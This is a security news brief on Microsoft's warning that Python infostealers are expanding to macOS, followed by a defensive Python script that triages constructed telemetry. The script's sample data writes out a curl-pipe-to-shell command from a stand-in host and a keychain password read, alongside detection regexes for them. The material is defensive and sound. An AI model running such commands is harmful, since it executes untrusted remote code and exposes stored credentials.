Microsoft Warns: Python Infostealers Expand from Windows to macOS

  • Feb 4

Key Findings


  • Microsoft warns that info-stealing attacks are "rapidly expanding" beyond Windows to target Apple macOS environments.

  • Attackers are leveraging cross-platform languages like Python and abusing trusted platforms to distribute infostealer malware at scale.


Background


  • Since late 2025, Microsoft has observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix-style prompts and malicious DMG installers.

  • These campaigns deploy macOS-specific infostealers like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS) using fileless execution, native macOS utilities, and AppleScript automation.

  • The attacks harvest credentials, session data, and secrets from web browsers, keychains, and developer environments.


Python-based Infostealers


  • Attackers favor Python-based stealers because the language lets them adapt quickly, reuse code across campaigns, and target heterogeneous environments with minimal overhead.

  • Malware like PXA Stealer, linked to Vietnamese-speaking threat actors, can harvest login credentials, financial information, and browser data.

  • Attackers have used phishing emails to distribute PXA Stealer, leveraging registry Run keys, scheduled tasks, and Telegram for persistence and command-and-control.


Abuse of Trusted Platforms


  • Bad actors have been observed weaponizing popular messaging apps like WhatsApp to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.

  • Fake PDF editors like Crystal PDF are also being distributed via malvertising and SEO poisoning to deploy Windows-based stealers that can steal cookies, session data, and credential caches.


Recommendations


  • Educate users on social engineering attacks like malvertising redirect chains, fake installers, and ClickFix-style copy-paste prompts.

  • Monitor for suspicious Terminal activity and access to the iCloud Keychain, and inspect network egress for POST requests to newly registered or suspicious domains.

  • Strengthen defenses against Python and LOLBIN abuse, enable cloud-delivered protection and EDR in block mode, and apply attack surface reduction rules.
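The monitoring recommendations above can be turned into simple triage logic. The following script is an added example, not code from the brief, from Microsoft, or from any of the cited sources; it runs over constructed endpoint telemetry (process executions and HTTP egress records) and flags the behaviours named in this summary: shell commands that read the Keychain through the native `security` utility or drive AppleScript through `osascript`, ClickFix-style fetch-and-execute one-liners, and POST requests to domains that are newly registered or unknown to a registration feed. The regexes, the 30-day "newly registered" threshold, the `REGISTERED` feed and every event, hostname and date are assumptions made for the example.

```python
"""Triage of constructed macOS telemetry for the infostealer tradecraft this
brief describes. All events, hostnames and registration dates are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import date

# Assumed detection patterns, not rules from the advisory. `security` is the
# macOS keychain CLI; `osascript` runs AppleScript from a shell.
KEYCHAIN_ACCESS = re.compile(
    r"\bsecurity\b.*\b(?:find-(?:generic|internet)-password|dump-keychain)\b"
    r"|login\.keychain-db"
)
APPLESCRIPT = re.compile(r"\bosascript\b")
# A download piped straight into an interpreter is the shape of a ClickFix
# copy-paste prompt.
FETCH_AND_EXEC = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash|zsh|python3?)\b")
NEW_DOMAIN_DAYS = 30  # assumed threshold for "newly registered"


@dataclass(frozen=True)
class ProcessEvent:
    ts: str
    parent: str   # parent process name, e.g. "Terminal"
    cmdline: str


@dataclass(frozen=True)
class EgressEvent:
    ts: str
    method: str
    host: str
    process: str


@dataclass(frozen=True)
class Finding:
    ts: str
    rule: str
    detail: str


def triage_process(ev: ProcessEvent) -> list[Finding]:
    """Return findings for one process-execution event."""
    checks = [
        ("keychain_access", KEYCHAIN_ACCESS),
        ("applescript_from_shell", APPLESCRIPT),
        ("fetch_and_execute", FETCH_AND_EXEC),
    ]
    return [Finding(ev.ts, rule, f"{ev.parent}: {ev.cmdline}")
            for rule, pat in checks if pat.search(ev.cmdline)]


def domain_age_days(host: str, registered: dict[str, date], today: date) -> int | None:
    """Age of the registrable domain in days, or None if the feed has no record.
    The feed is a plain dict here; in practice it would come from RDAP/WHOIS or
    a passive-DNS first-seen source."""
    parts = host.lower().rstrip(".").split(".")
    domain = ".".join(parts[-2:]) if len(parts) >= 2 else parts[0]
    reg = registered.get(domain)
    return (today - reg).days if reg else None


def triage_egress(ev: EgressEvent, registered: dict[str, date], today: date) -> list[Finding]:
    """Flag POSTs to domains registered within NEW_DOMAIN_DAYS or unknown to the feed."""
    if ev.method.upper() != "POST":
        return []
    age = domain_age_days(ev.host, registered, today)
    if age is None:
        return [Finding(ev.ts, "post_to_unknown_domain", f"{ev.process} -> {ev.host}")]
    if age <= NEW_DOMAIN_DAYS:
        return [Finding(ev.ts, "post_to_new_domain", f"{ev.process} -> {ev.host} ({age}d old)")]
    return []


# Constructed sample telemetry and registration feed (all values invented).
TODAY = date(2026, 2, 4)
REGISTERED = {"fresh-domain.example": date(2026, 1, 20),
              "long-standing.example": date(2015, 3, 1)}
PROCESS_EVENTS = [
    ProcessEvent("2026-02-04T10:01:00Z", "Terminal", "curl -fsSL https://update-check.example/i.sh | sh"),
    ProcessEvent("2026-02-04T10:01:03Z", "zsh", "osascript -e 'tell application \"System Events\" to get name of every process'"),
    ProcessEvent("2026-02-04T10:01:05Z", "zsh", "security find-generic-password -wa alice"),
    ProcessEvent("2026-02-04T10:02:00Z", "Terminal", "ls -la ~/Library"),
]
EGRESS_EVENTS = [
    EgressEvent("2026-02-04T10:01:09Z", "POST", "collect.fresh-domain.example", "python3"),
    EgressEvent("2026-02-04T10:01:10Z", "GET", "cdn.fresh-domain.example", "python3"),
    EgressEvent("2026-02-04T10:03:00Z", "POST", "api.long-standing.example", "Safari"),
    EgressEvent("2026-02-04T10:03:30Z", "POST", "unlisted.example", "python3"),
]


def run_example() -> list[Finding]:
    """Triage the constructed telemetry and return every finding in order."""
    findings: list[Finding] = []
    for ev in PROCESS_EVENTS:
        findings.extend(triage_process(ev))
    for ev in EGRESS_EVENTS:
        findings.extend(triage_egress(ev, REGISTERED, TODAY))
    return findings


if __name__ == "__main__":
    for f in run_example():
        print(f"{f.ts} {f.rule:<24} {f.detail}")
```

The process checks deliberately key on the command line rather than on the parent process, since Terminal and iTerm2 are noisy on developer machines; the parent is kept in the finding detail for the analyst. The egress check treats an unknown domain as its own rule, separate from a confirmed-new one, because a missing feed record is a coverage gap rather than evidence of age.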


Sources


  • https://thehackernews.com/2026/02/microsoft-warns-python-infostealers.html

  • https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html

  • https://x.com/TheCyberSecHub/status/2018966095005356318

  • https://medium.com/@costigermano/microsoft-warns-python-infostealers-are-expanding-to-macos-through-fake-ads-and-installers-eda30b224507

  • https://www.thedailystar.net/tech-startup/news/infostealers-target-macos-fake-ads-and-installers-microsoft-says-4098001

  • https://www.cypro.se/2026/02/04/microsoft-warns-python-infostealers-target-macos-via-fake-ads-and-installers/


© 2025 by Explain IT Again. Powered and secured by Wix